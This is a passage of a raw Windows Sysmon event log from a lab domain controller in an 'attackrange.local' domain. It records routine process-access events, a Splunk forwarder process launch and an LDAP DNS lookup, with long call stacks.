13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:39.270{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:44.645{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FA0-6005-FA00-00000000A301}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:44.645{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:44.645{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:44.645{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:44.645{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:44.645{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:44.645{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:44.645{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:44.645{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:44.645{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:44.645{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8FA0-6005-FA00-00000000A301}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:44.645{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FA0-6005-FA00-00000000A301}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:44.646{59A5CD1D-8FA0-6005-FA00-00000000A301}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000004636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:43.597{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 10341000x80000000000000004635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.520{59A5CD1D-8FA1-6005-FB00-00000000A301}12441340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.364{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FA1-6005-FB00-00000000A301}1244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1